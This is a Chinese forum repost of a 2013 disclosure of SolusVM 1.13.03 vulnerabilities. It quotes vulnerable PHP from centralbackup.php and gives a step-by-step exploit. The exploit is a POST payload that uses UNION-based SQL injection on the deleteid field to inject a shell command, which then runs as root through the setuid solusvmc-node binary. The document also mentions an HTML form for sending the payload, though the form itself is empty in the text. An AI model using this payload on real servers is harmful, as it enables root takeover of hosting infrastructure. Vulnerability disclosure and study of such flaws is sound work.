|
相信这几天用SolusVM的同学都提心吊胆了好多天吧……
做好数据备份的同学淡定地用吧……
============以上是废话============
披露漏洞的博主地址:http://localhost.re/p/solusvm-11303-vulnerabilities
本文转载自:http://www.freebuf.com/vuls/10611.html
SolusVM 1.13.03 Vulnerabilities
2013/06/16
/centralbackup.php:[ol] query('SELECT * FROM centralbackup WHERE id = \'' . $_POST['deleteid'] . '\'', true); #[...] if ($xc[status] == 'failed') { exec('php /usr/local/solusvm/system/bus.php -- --comm=deletebackup --serverid=' . $xc['bserver'] . ' --nodeid=' . $vdata['nodeid'] . ' --vserverid=' . $vdata['vserverid'] . ' --filename=' . $xc['filename']); #[...] } }?>[/ol]复制代码到了这里我们该怎么做的?SQL注入?exec()?setuid为0?都正确! 让我们来看看exp是怎样的?非常简单的三步[ol]1.在激活的VM中拥有一个账户2.登陆,在VM中点击,拷贝GET _v值3.POST 至/centralbackup.php?_v=[value][/ol]复制代码[ol]delete=1&deleteid=-1' union select 0,0,0,0,0,'failed',';/usr/local/solusvm/core/solusvmc-node --ebtables ";command to run as root";',0#[/ol]复制代码或者使用以下Html表单[ol] CMD:
[/ol]复制代码 |
|